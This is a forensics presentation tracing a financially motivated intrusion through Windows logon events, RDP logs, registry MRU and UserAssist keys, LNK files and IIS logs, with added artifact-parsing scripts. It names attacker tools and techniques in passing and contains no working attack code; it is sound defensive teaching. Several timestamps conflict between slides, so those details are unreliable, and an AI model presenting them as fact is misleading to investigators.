1
Using Interactive Artifacts to Track Attacker Actions
§ Phillip Kealy
2
Overview
§ Background
§ Disclaimer
§ Presentation Goals
§ Interactive Artifact Overview
§ Case Study + Interactive Artifacts
§ Scaling Investigations using Interactive Artifacts
3
Background
§ Who am I?
§ Career
- Operational
- CIRT
- Security Manager
- Consulting
4
DISCLAIMER
Case studies and examples are drawn from our
experiences and activities working for a variety of
customers, and do not represent our work for any
one customer or set of customers.
In many cases, facts have been changed to obscure
the identity of our customers and individuals
associated with our customers.
5
Presentation Goals
§ Define Methods for Interactive Logons
§ Provide overview of available artifacts
§ Methods to use multiple evidence sources to
provide in-depth story
6
What are Interactive artifacts?
§ Forensic Artifacts that record user activity during an interactive logon session
§ Examples of interactive logon sessions:
- Physically at the keyboard
- Remote Desktop
- Third Party Utilities
• ScreenConnect
• VNC
• More
- PsExec
7
User Profiles
What happens upon a user's first interactive logon?
§ Log entries (more on this shortly)
§ Creation of the user profile
- C:\Users\%USERNAME%
- User registry hives (NTUSER.DAT, UsrClass.dat)
§ A user profile can prove an interactive logon occurred, even without event log evidence. Corroborate it where you can: a profile is also created when a service or scheduled task runs as that account with the profile loaded, so the profile alone does not tell you how the account was used.
[Diagram: frank --RDP--> ITJumpServer, where C:\Users\frank\* is created]
8
Case Study – FIN9
§ Financially Motivated Attacker
§ Uses minimal malware for initial access and to
maintain presence
§ Exploits business processes and systems for
financial gain
9
Targeted Attack Lifecycle – FIN9
• Phishing email
• Word document with macros
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• Dameware
• NanoCore
• Mimikatz
• Keystroke logging
• Fake logon screen
• Sticky Keys
• Built-in Windows utilities
• Net commands
• File shares
• Search for systems of interest
• Legitimate access to apps
• Direct DB access using 1ClickDB
• Remote Desktop
• File shares
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• SoftToken certificate theft
10
Wipro + Brian Krebs
11
Initial Lead
§ Fraud department located unauthorized gift cards issued on January 22, 2019
§ Suspicious rewards database interaction on January 22, 2019 traced back to WebServerA
§ Live response analysis indicated the attacker installed 1ClickDB via a Remote Desktop logon session on WebServerA using the Domain Admin account Frank
- The RDP session used to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address
§ IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of IT JumpServer
- Connections to the 1ClickDB web page occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC
§ Now what?
- Live response analysis of WebServerA
12
Windows Logon Events
Type 2 – Interactive
- Physical console
- Screen sharing (VNC, ScreenConnect and similar tools drive the existing console session)
- "RunAs"
- PsExec when run with explicit alternate credentials (-u); without them PsExec produces a Type 3 network logon on the target
Type 10 – RemoteInteractive
- Remote Desktop / Terminal Services
Type 7 – Unlock (credentials used to unlock the screen)
Type 12 – CachedRemoteInteractive (a Type 10 logon satisfied from cached domain credentials)
Type 13 – CachedUnlock
13
Type 10 Logon – RDP
[Diagram: Unknown System --RDP--> ITJumpServer; the "Rewards" domain controller authenticates the account; EID 4624 is written to ITJumpServer's Security event log]
Security event log, EID 4624:
An account was successfully logged on.
User Name: franktheadmin
Domain: Rewards
Logon ID: (0x0,0x151F248)
Logon Type: 10
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: ITJumpServer
Source Network Address: 192.168.1.101
In this Type 10 event the Workstation Name is the RDP server that logged the event (ITJumpServer); the connecting client is identified by Source Network Address.
14
RDP Event Logs
EID 1149 is written to Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational; EIDs 21, 23 and 24 are written to Microsoft-Windows-TerminalServices-LocalSessionManager/Operational. With Network Level Authentication enabled, 1149 records that the credentials authenticated at the network layer; it does not by itself prove a desktop session was established, so pair it with EID 21.
Date & Time | EID | Message
2019-01-22 01:33:23 | 1149 | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | 21 | Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 02:39:45 | 23 | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | 24 | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
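The following is an added example and not part of the original deck. It ties EID 1149 (authentication) to EID 21 (session logon) and EID 23/24 (logoff/disconnect) records to rebuild RDP sessions with their source address and duration, falls back to the last untied 1149 when the logon event is missing, and flags a loopback source address. The TsEvent records are constructed from the values shown on this slide and on the later ConfPC slides; in a real case the same fields come from parsed EVTX output (EvtxECmd, python-evtx or similar).

```python
# Added example: reconstruct RDP sessions from TerminalServices event records.
# Records below are constructed from the slide values, not parsed from a real log.
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional


@dataclass
class TsEvent:
    host: str                      # system whose event log holds the record
    time: datetime                 # UTC
    event_id: int                  # 1149 (RemoteConnectionManager) or 21/23/24 (LocalSessionManager)
    user: str                      # DOMAIN\user; EID 1149 has separate User/Domain fields, joined here
    source: str                    # Source Network Address, "" when the event has none (EID 23)
    session_id: Optional[int] = None


def _pop_auth(pending: List[TsEvent], e: TsEvent) -> Optional[TsEvent]:
    """Take the most recent untied EID 1149 for the same host and user (and source, if both carry one)."""
    for i in range(len(pending) - 1, -1, -1):
        a = pending[i]
        if (a.host == e.host and a.user.lower() == e.user.lower() and a.time <= e.time
                and (not e.source or a.source == e.source)):
            return pending.pop(i)
    return None


def _new_session(e: TsEvent, auth: Optional[TsEvent], flags: List[str]) -> dict:
    return {"host": e.host, "user": e.user.lower(),
            "source": e.source or (auth.source if auth else ""),
            "session_id": e.session_id, "auth": auth.time if auth else None,
            "start": None, "end": None, "duration_s": None, "flags": list(flags)}


def reconstruct_sessions(events: List[TsEvent]) -> List[dict]:
    # at equal timestamps 1149 sorts before 21, so authentication is tied to the logon it preceded
    order = {1149: 0, 21: 1}
    events = sorted(events, key=lambda e: (e.time, order.get(e.event_id, 2)))
    sessions, by_key, pending = [], {}, []
    for e in events:
        if e.event_id == 1149:
            pending.append(e)
        elif e.event_id == 21:                          # Session logon succeeded
            s = _new_session(e, _pop_auth(pending, e), [])
            s["start"] = e.time
            by_key[(e.host, e.session_id)] = s
            sessions.append(s)
        elif e.event_id in (23, 24):                    # Session logoff / disconnected
            s = by_key.get((e.host, e.session_id))
            if s is None:
                # no EID 21 for this session id (rolled or cleared log): fall back to the last untied 1149
                auth = _pop_auth(pending, e)
                s = _new_session(e, auth, ["start_inferred_from_1149" if auth else "no_logon_event"])
                s["start"] = auth.time if auth else None
                by_key[(e.host, e.session_id)] = s
                sessions.append(s)
            if s["end"] is None or e.time > s["end"]:
                s["end"] = e.time
    for a in pending:                                   # authenticated, but no session events survived
        sessions.append(_new_session(a, a, ["auth_only"]))
    for s in sessions:
        if s["source"].startswith("127.") or s["source"] == "::1":
            s["flags"].append("loopback_source")        # client sat on the host itself: port forward / tunnel
        if s["start"] and s["end"]:
            s["duration_s"] = int((s["end"] - s["start"]).total_seconds())
    return sorted(sessions, key=lambda s: s["auth"] or s["start"] or s["end"])


def ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed from the slides: ITJumpServer (this slide) and ConfPC (later slides)
SAMPLE_EVENTS = [
    TsEvent("ITJumpServer", ts("2019-01-22 01:33:23"), 1149, r"rewards\dave", "192.168.1.101"),
    TsEvent("ITJumpServer", ts("2019-01-22 01:33:23"), 21, r"rewards\dave", "192.168.1.101", 2),
    TsEvent("ITJumpServer", ts("2019-01-22 02:39:45"), 23, r"rewards\dave", "", 2),
    TsEvent("ITJumpServer", ts("2019-01-22 02:39:45"), 24, r"rewards\dave", "192.168.1.101", 2),
    TsEvent("ConfPC", ts("2018-12-24 23:11:21"), 1149, r"rewards\ITAdmin", "127.0.0.1"),
    TsEvent("ConfPC", ts("2019-01-22 00:23:33"), 1149, r"rewards\ITAdmin", "127.0.0.1"),
    TsEvent("ConfPC", ts("2019-01-22 02:55:45"), 24, r"rewards\ITAdmin", "127.0.0.1", 2),
]

if __name__ == "__main__":
    for s in reconstruct_sessions(SAMPLE_EVENTS):
        print(s["host"], s["user"], s["source"], s["start"], s["end"], s["duration_s"], s["flags"])
```

The loopback flag is what later turns the ConfPC records from "an admin using RDP" into "someone reaching the host through a tunnel"; the inferred-start flag keeps the analyst honest about which boundary came from a real logon event.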
15
User Registry Hives
Registry file on disk | Loaded hive path | Windows version
\Users\<username>\NTUSER.DAT | HKEY_USERS\<User SID> | Vista/2008+
\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat | HKEY_USERS\<User SID>_Classes | Vista/2008+
16
LNK Files
§ Windows shortcut files
§ Auto-generated when a file is opened in Explorer
§ Support the "Recent Files" / "Recent Docs" functionality
LNK file paths (Windows Vista, 7, Server 2008 and later):
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent
17
Data within LNK Files
§ Full file path (local or network)
§ Attributes and logical size
§ MAC timestamps of the referenced file as they were when it was last opened
§ Volume serial number and, in the tracker data, the NetBIOS name and MAC address of the host that created the shortcut
§ Output from lnkparse.py (screenshot)
lnkparse.py: sourceforge.net/projects/jafat/files/lnk-parse/
18
LNK File of Interest
Date & Time | Timestamp | File name
2019-01-22 01:39:23 | Created | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
Target recorded inside the LNK:
Date & Time | Timestamp | File name
2019-01-22 01:36:23 | Created, Modified, Accessed | C:\Users\dave\Desktop\result.txt
19
Most Recently Used (MRU) Keys
"RecentDocs" – recently opened files, with one subkey per file type (.ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc.)
HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
§ Binary format: each numbered value holds the UTF-16 file name followed by a shell item; the MRUListEx value gives the order, most recent first
§ Each file-type subkey keeps the 10 most recently opened files of that type
§ The subkey's LastWrite time is the time of the most recent open that changed the list
Key Last Write | Registry Key | Parsed MRU Value
2019-01-22 01:36:23 | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt | 0 = result.txt
2019-01-22 01:35:34 | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip | 0 = omg.zip
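Added example, not from the deck: how a RecentDocs extension subkey is turned into the "Parsed MRU Value" column above. MRUListEx is a list of little-endian DWORD indexes, most recent first, terminated by 0xFFFFFFFF, and each numbered value starts with the UTF-16LE file name followed by a shell item for the matching .lnk. The subkey contents here (file names and a placeholder shell item) are constructed; a real hive would be read with python-registry or RECmd and the bytes handed to the same functions.

```python
# Added example: parse a RecentDocs extension subkey into MRU order.
# The value bytes are constructed to the documented layout, not read from a hive.
import struct
from typing import Dict, List, Tuple


def parse_mrulistex(data: bytes) -> List[int]:
    """MRUListEx: little-endian DWORD indexes, most recent first, terminated by 0xFFFFFFFF."""
    order = []
    for (idx,) in struct.iter_unpack("<I", data[: len(data) // 4 * 4]):
        if idx == 0xFFFFFFFF:
            break
        order.append(idx)
    return order


def parse_recentdocs_entry(data: bytes) -> Tuple[str, bytes]:
    """Entry = UTF-16LE file name, NUL-terminated, followed by a shell item naming the .lnk."""
    end = 0
    while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
        end += 2                       # step by code unit so a 0x00 byte inside a character is not a terminator
    name = data[:end].decode("utf-16-le")
    return name, data[end + 2:]


def recent_docs_in_order(values: Dict[str, bytes]) -> List[Tuple[int, str]]:
    """(index, filename) pairs in MRU order for one RecentDocs subkey such as '.txt'."""
    out = []
    for idx in parse_mrulistex(values["MRUListEx"]):
        raw = values.get(str(idx))
        if raw is None:
            continue                   # dangling index: value deleted but the list not rewritten
        name, _shell_item = parse_recentdocs_entry(raw)
        out.append((idx, name))
    return out


def _entry(name: str) -> bytes:
    # constructed: name + terminator + a two-byte placeholder where the real shell item would sit
    return name.encode("utf-16-le") + b"\x00\x00" + b"\x00\x00"


# Constructed stand-in for RecentDocs\.txt: value 0 is the most recent, then 2, then 1
SAMPLE_TXT_SUBKEY = {
    "MRUListEx": struct.pack("<4I", 0, 2, 1, 0xFFFFFFFF),
    "0": _entry("result.txt"),
    "1": _entry("notes.txt"),
    "2": _entry("passwords.txt"),
}

if __name__ == "__main__":
    for idx, name in recent_docs_in_order(SAMPLE_TXT_SUBKEY):
        print(f"{idx} = {name}")
```

The value index is a slot number, not a rank: "0 = result.txt" on the slide means slot 0 was first in MRUListEx, which is why the list must be parsed rather than the values read in numeric order.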
20
Anatomy of a Registry Key
Example: Run key
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value Name: NotMalware
Value Data: C:\ProgramData\TotallyMalware\Evil.exe
21
Anatomy of a Registry Key
Example: Run key
Key Last Modified: 2017-06-05 19:33:51
§ Values carry no timestamp of their own; they inherit the Last Modified (LastWrite) time of their parent key
22
Registry Timestamps
A timestamp is applied to the key and is updated when:
1) the key is created 2) a value is created or deleted 3) the data of any value is modified
Note: registry timestamps can be modified, although this is not very common
23
Evidence of Execution
Artifact | Default Enabled | User Agnostic | All Windows Versions | Execution Visibility
ShimCache | Yes | Yes | Yes | Yes
AmCache | Yes | Yes | No | Yes
UserAssist | Yes | No | Yes | GUI only
MUICache | Yes | No | Yes | GUI only
Prefetch | Workstations only | Yes | Yes | Yes
Windows Events | No | Yes | Yes | Yes
WMI RUA | No | Yes | Yes | Yes
Caveat: ShimCache and AmCache entries show that a file was present and processed by the application-compatibility or inventory components, not that it necessarily ran. On Windows 8 and later in particular, corroborate them with Prefetch, UserAssist or process-creation events before asserting execution.
24
UserAssist and MUICache
Track programs launched through the Windows Explorer GUI
UserAssist: HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count (NTUSER.DAT)
MUICache: HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam\MUICache (NTUSER.DAT on Windows XP); from Vista onward it lives in UsrClass.dat under HKEY_USERS\{SID}_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
UserAssist
- One value per executable file
  • ROT13-encoded value names
- Number of times each program ran
- Last execution time
MUICache
- One value per executable file
  • Clear text
- Records the "FileDescription" resource of PE files
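Added example, not from the deck: decoding a Windows 7 and later UserAssist Count value by hand. The ROT13 value name and the 72-byte data layout (run count at offset 4, focus count at 8, focus time at 12, FILETIME of the last run at 60) are the same fields RegRipper's userassist plugin prints; the known-folder expansion assumes the system root is C:\Windows, and the sample value (mstsc.exe, run 3 times, last at 2019-01-22 02:28:01 UTC as in the decoded table later in the deck) is constructed by the block itself.

```python
# Added example: decode a UserAssist\{GUID}\Count value (Windows 7+ layout).
# The sample value is constructed below; real values come from NTUSER.DAT.
import codecs
import struct
from datetime import datetime, timedelta, timezone

# KNOWNFOLDERID GUIDs seen in UserAssist names (subset; SystemRoot assumed to be C:\Windows)
KNOWN_FOLDERS = {
    "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}": r"C:\Windows\System32",
    "{6D809377-6AF0-444B-8957-A3773F02200E}": r"C:\Program Files",
    "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}": r"C:\Program Files (x86)",
    "{F38BF404-1D43-42F2-9305-67DE0B28FC23}": r"C:\Windows",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME = 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    d = dt - FILETIME_EPOCH          # integer arithmetic: a float loses precision at ~1e17 ticks
    return ((d.days * 86400 + d.seconds) * 1_000_000 + d.microseconds) * 10


def decode_name(value_name: str) -> str:
    """ROT13 the value name and expand a leading known-folder GUID."""
    path = codecs.decode(value_name, "rot_13")
    for guid, folder in KNOWN_FOLDERS.items():
        if path.upper().startswith(guid):
            return folder + path[len(guid):]
    return path


def parse_count_value(value_name: str, data: bytes) -> dict:
    if len(data) < 68:
        raise ValueError("expected the 72-byte Windows 7+ UserAssist layout")
    _session, run_count, focus_count, focus_ms = struct.unpack_from("<4I", data, 0)
    (last_ft,) = struct.unpack_from("<Q", data, 60)
    return {
        "path": decode_name(value_name),
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_s": focus_ms / 1000,
        "last_run": filetime_to_datetime(last_ft) if last_ft else None,   # zero = never recorded
    }


def _constructed_value(path: str, run_count: int, last_run: datetime) -> tuple:
    """Build a (name, data) pair in the layout parse_count_value expects, for the demonstration."""
    name = codecs.encode(path, "rot_13")
    data = (struct.pack("<4I", 0, run_count, 0, 0) + bytes(40) + bytes(4)
            + struct.pack("<Q", datetime_to_filetime(last_run)) + bytes(4))
    return name, data


SAMPLE_NAME, SAMPLE_DATA = _constructed_value(
    r"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe", 3,
    datetime(2019, 1, 22, 2, 28, 1, tzinfo=timezone.utc))

if __name__ == "__main__":
    print(SAMPLE_NAME)                       # the ROT13 form as stored in the hive
    print(parse_count_value(SAMPLE_NAME, SAMPLE_DATA))
```

The ROT13 step also applies to the hex letters of the GUID, which is why the raw value names look like garbage; decode first, then match the GUID.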
25
UserAssist Evidence
Raw contents of the UserAssist key (screenshot) and the same data decoded by RegRipper's userassist plugin (v.20080726, NTUSER.DAT), which displays the contents of the UserAssist Active Desktop key:
UserAssist (Active Desktop)
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
LastWrite Time Fri Jul 29 21:46:41 2011 (UTC)
Fri Jul 29 21:46:41 2017 (UTC)
UEME_RUNPATH (3)
UEME_RUNPATH:C:\Program Files\7-Zip\7zFM.exe (1)
Fri Jul 29 21:46:17 2017 (UTC)
UEME_RUNPATH:C:\Program Files\Windows NT\Accessories\WORDPAD.EXE (1)
Fri Jul 29 21:44:45 2017 (UTC)
UEME_RUNPIDL:%csidl2%\Internet Explorer.lnk (15)
UEME_RUNPATH:C:\Program Files\Internet Explorer\IEXPLORE.EXE (1)
The UEME_RUNPATH / UEME_RUNPIDL prefixes and the {75048700-…} GUID are the Windows XP layout. On Windows 7 and later the same data sits under {CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} (executables) and {F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} (shortcuts) without the UEME_ prefix.
26
MUICache Evidence
Raw contents of the MUICache key (screenshot)
27
Decoded UserAssist Data
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7} is the known-folder GUID for %SystemRoot%\System32.
Last Execution Time | Registry Value (decoded) | Times Executed
2019-01-22 01:36:23 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\msiexec.exe | 1
2019-01-22 01:33:48 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ServerManager.exe | 1
2019-01-22 01:39:23 | C:\Users\dave\Desktop\omg.exe | 1
2019-01-22 01:43:23 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc | 1
2019-01-22 01:44:56 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe | 1
2019-01-22 02:28:01 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe | 3
dssite.msc is Active Directory Sites and Services and dsac.exe is the Active Directory Administrative Center: the account was surveying the domain from the jump server before launching the Remote Desktop client (mstsc.exe) three times.
28
Jump Lists
§ Provide the user quick access to recently used apps
§ Each user has their own jump lists
§ Show evidence of accessed resources
§ Two types of jump lists
§ Require parsing to be human readable
- JumpListParser, JLECmd, jmp
Automatic: %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations
Custom: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations
29
Jump Lists
§ Automatic – created automatically when a user interacts with a resource
§ Custom – created when a user "pins" an item
30
Browser History, Cache, and Downloads
§ User Specific Artifact
§ Enumerate Browsers
§ Extract Browsing History
§ Collect Browser Cache
§ Collect Downloaded Files
31
Web Server Side Data - Logging GET vs. POST
GET Requests | POST Requests
"Retrieve" content specified in the request address | Tell the server to accept the data enclosed in the packet contents
Key-value pairs passed as part of the URI | Key-value pairs passed in the message body
Fully captured in logs (cs-uri-query) | Request parameters not logged; IIS records only the method, the URI and any query string
Impact: malicious activity in POST requests can be hard to detect!
32
Web Server Side Data - Content Encoding
§ Special characters in HTTP requests are URL-encoded by the web browser
- % followed by the two hexadecimal digits of the byte value
- Spaces can be represented by %20 or +
http://www.foo.com/search.aspx?name=John & Mark Co.&op=1
…is converted to (and will be logged as)…
http://www.foo.com/search.aspx?name=John%20%26%20Mark%20Co.&op=1
33
1ClickDB requests as recorded in the IIS logs (cs-method, cs-uri-stem and cs-uri-query; <SYSTEM> marks redacted names):
GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG"
GET /images/Schema.asp
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_USERS"&
GET /images/Connect.asp
GET /images/Schema.asp
GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM>_USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A=
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
The GET requests show the schema being read, the USERS table browsed and filtered by e-mail address and surname, and Edit.asp opened for sqlid=1989; the parameters of the final POST to Command.asp travelled in the body and are not in the log.
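Added example, not from the deck, covering both the content-encoding slide and the GET/POST slide: a parser for W3C-format IIS logs that URL-decodes cs-uri-query the way the server saw it, lifts out the 1ClickDB parameters (sqlfrom_A, sqlwhere_A) and marks POST requests whose parameters never reached the log. The log lines, the server address 10.10.10.20 and the table name "dbo"."APP_USERS" are constructed stand-ins for the redacted values on the slide.

```python
# Added example: parse IIS W3C log lines and decode the 1ClickDB query parameters.
# SAMPLE_LOG is constructed; the field list matches a common IIS logging configuration.
from typing import Dict, List
from urllib.parse import parse_qs


def parse_iis_w3c(text: str) -> List[Dict[str, str]]:
    """Map each data line onto the names from the most recent #Fields directive."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            parts = line.split(" ")           # IIS encodes spaces inside fields as + or %20
            if fields and len(parts) == len(fields):
                records.append(dict(zip(fields, parts)))
    return records


def decode_query(cs_uri_query: str) -> Dict[str, str]:
    """%XX and '+' decoding; IIS writes '-' for an empty query. Last value wins for repeated keys."""
    if cs_uri_query in ("-", ""):
        return {}
    return {k: v[-1] for k, v in parse_qs(cs_uri_query, keep_blank_values=True).items()}


def summarize_1clickdb(records: List[Dict[str, str]]) -> List[dict]:
    out = []
    for r in records:
        params = decode_query(r.get("cs-uri-query", "-"))
        entry = {
            "time": f'{r["date"]} {r["time"]}',
            "client": r.get("c-ip", "-"),
            "method": r["cs-method"],
            "page": r["cs-uri-stem"].rsplit("/", 1)[-1],
            "table": params.get("sqlfrom_A") or params.get("sqlfrom"),
            "filter": params.get("sqlwhere_A") or params.get("sqlwhere"),
            "params": params,
            "flags": [],
        }
        if r["cs-method"] == "POST":
            entry["flags"].append("body_not_logged")   # parameters travelled in the message body
        out.append(entry)
    return out


SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-01-22 01:45:33 10.10.10.20 GET /images/Browse.asp sqlfrom_A="dbo"."APP_USERS" 80 - 192.168.1.101 Mozilla/5.0+(Windows+NT+6.1) 200
2019-01-22 01:47:02 10.10.10.20 GET /images/Browse.asp sqlorderby_A=&sqlwhere_A=("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."APP_USERS" 80 - 192.168.1.101 Mozilla/5.0+(Windows+NT+6.1) 200
2019-01-22 01:52:10 10.10.10.20 GET /search.aspx name=John%20%26%20Mark%20Co.&op=1 80 - 192.168.1.101 Mozilla/5.0+(Windows+NT+6.1) 200
2019-01-22 02:30:12 10.10.10.20 POST /images/Command.asp nocache=1/22/2019+2:30:12+AM 80 - 192.168.1.101 Mozilla/5.0+(Windows+NT+6.1) 200
"""

if __name__ == "__main__":
    for row in summarize_1clickdb(parse_iis_w3c(SAMPLE_LOG)):
        print(row["time"], row["client"], row["method"], row["page"], row["table"], row["filter"], row["flags"])
```

Note that the trailing `%')` in the LIKE pattern is not a valid percent escape, so the decoder leaves it alone; a decoder that rejects malformed escapes would drop exactly the request you most want to read.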
34
What do we know so far?
Time | Source | Details
2019-01-22 01:33:23 | EventLog | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | EventLog | Remote Desktop Services: Session logon succeeded: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 01:35:34 | Registry:LastWrite | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
2019-01-22 01:39:03 | LNK:Create Time | C:\Users\dave\Desktop\result.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
2019-01-22 01:39:23 | FN:Create Time | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:39:23 | Registry:LastWrite | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
2019-01-22 01:39:23 | UserAssist:Dave | C:\Users\dave\Desktop\omg.exe
2019-01-22 01:43:23 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
2019-01-22 01:44:56 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
2019-01-22 01:45:33 | IE:BrowserCache | Earliest browser cache artifact created
2019-01-22 02:28:01 | UserAssist:Dave | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
2019-01-22 02:30:12 | IE:BrowserCache | Most recent browser artifact modified
2019-01-22 02:39:45 | EventLog | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | EventLog | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
The browser cache window (01:45:33 to 02:30:12) matches the 1ClickDB connections recorded in WebServerA's IIS logs, placing dave's RDP session on ITJumpServer behind the database access.
§ What next?
35
Attack Diagram
[Diagram: Unknown System --Remote Desktop--> Jump Server --Web Access (1ClickDB)--> Web Server --Direct DB Access--> Database Server]
36
RDP Event Logs
Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational (ConfPC)
Date & Time | EID | Message
2018-12-24 23:11:21 | 1149 | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2019-01-22 00:23:33 | 1149 | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
A loopback Source Network Address on an RDP authentication means the client connected to a listener on the host itself, such as a port forward, rather than from the network.
37
RDP MRU Keys
The Remote Desktop client records the servers a user connected to under HKEY_USERS\{SID}\Software\Microsoft\Terminal Server Client: Default\MRU0 to MRU9 hold the most recent hostnames, and Servers\<hostname>\UsernameHint the account last used for each (screenshot).
38
RDP MRU Keys
Key Last Write | Hostname | User
2018-12-25 00:00:23 | 192.168.1.38 | rewards\ITAdmin
2018-12-25 00:33:42 | RewardsDB | rewards\DBO
2019-01-01 02:53:11 | Webserver2 | rewards\frank
2019-01-15 00:15:01 | ITJumpserver | rewards\dave
39
RDP Bitmap Cache Files
§ Store frequently used screen tiles from RDP sessions the client has made
§ Improve user experience
§ Located at:
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache2.bmc
- C:\Users\<username>\AppData\Local\Microsoft\Terminal Server Client\Cache\Cache[0-9]{4}.bin
§ The tiles can be extracted and reassembled (for example with ANSSI's bmc-tools) to recover fragments of what the attacker saw on the remote screen
40
41
Uninstall or Disable Endpoint Agents
42
Registry Shellbags
§ Windows Explorer usage
§ Record size, position and view settings of Explorer windows
§ Provide evidence of user access to local & remote directories
Windows XP (NTUSER.DAT):
HKEY_USERS\{SID}\Software\Microsoft\Windows\Shell
HKEY_USERS\{SID}\Software\Microsoft\Windows\ShellNoRoam
Windows Vista/2008+ (mainly \Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat):
HKEY_USERS\{SID}_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU and ...\Shell\Bags
43
Registry Shellbags
Decoded shellbag keys can provide
